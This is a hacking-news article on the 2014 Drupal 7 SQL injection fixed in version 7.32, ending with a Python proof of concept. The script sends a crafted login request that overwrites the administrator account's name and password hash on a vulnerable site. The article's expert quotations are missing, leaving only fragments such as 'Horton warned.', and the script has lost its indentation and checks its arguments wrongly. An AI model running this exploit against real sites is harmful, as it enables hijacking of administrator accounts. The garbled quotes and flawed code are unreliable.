Home Hacking New Drupal SQL Injection On v7.32 Disclosed Publically

New Drupal SQL Injection On v7.32 Disclosed Publically

3 min read
0
0

New Drupal SQL Injection On v7.32 Disclosed Publically

New Drupal SQL Injection has been discovered and reported to the Drupal security team who have stated that versions of Drupal 7 prior to 7.32 are vulnerable to a “Highly Critical” SQL injection bug. Version 7.32 is now available to address the bug and the Drupal team strongly recommends that Drupal 7 admins update their sites immediately. Drupal is a popular content management system that is free and open source.

An attacker could exploit this vulnerability to achieve privilege escalation or execute arbitrary PHP code. Other unspecified attacks are said to be possible. At the time the vulnerability was disclosed no know exploits were being used. The attack can be launched by an anonymous user, meaning that no social engineering or other work is necessary to allow for it.

Robert Horton, European managing director of security consulting at NCC Group, said that the Drupal flaw is of particular concern because it’s

Horton warned.

Despite its severity the Drupal bug was overlooked for months, Horton added.

Horton said.

Here is a POC of the vulnerability below:

#Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005
#Creditz to https://www.reddit.com/user/fyukyuk
import urllib2,sys
from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py
host = sys.argv[1]
user = sys.argv[2]
password = sys.argv[3]
if len(sys.argv) != 3:
print "host username password"
print "http://nope.io admin wowsecure"
hash = DrupalHash("$S$CTo9G7Lx28rzCfpn4WB2hUlknDKv6QTqHaf82WLbhPT2K5TzKzML", password).get_hash()
target = '%s/?q=node&destination=node' % host
post_data = "name[0%20;update+users+set+name%3d'"
+user
+"'+,+pass+%3d+'"
+hash[:55]
+"'+where+uid+%3d+'1';;#%20%20]=bob&name[0]=larry&pass=lol&form_build_id=&form_id=user_login_block&op=Log+in"
content = urllib2.urlopen(url=target, data=post_data).read()
if "mb_strlen() expects parameter 1" in content:
print "Success!nLogin now with user:%s and pass:%s" % (user, password)

Load More Related Articles
Load More In Hacking

Leave a Reply

Your email address will not be published. Required fields are marked *

Check Also

New Cold Boot Attacks Can Evade Current Mitigations

New Cold Boot Attacks Can Evade Current Mitigations Many people tend to put laptops to ‘Sl…